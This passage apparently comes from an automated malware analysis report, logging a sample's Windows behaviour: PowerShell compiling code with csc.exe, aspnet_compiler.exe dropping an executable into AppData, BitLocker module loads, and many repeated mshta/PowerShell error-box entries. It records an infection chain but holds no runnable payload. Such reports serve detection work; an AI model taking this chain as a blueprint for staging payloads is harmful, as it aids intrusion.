Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00803DA5 push eax; iretd	9_2_00803DB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_06F12AEE push dword ptr [ebp+ebx-75h]; iretd	9_2_06F12AF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00402AC0 push eax; ret	11_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00402AC0 push eax; ret	11_2_00402AFC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
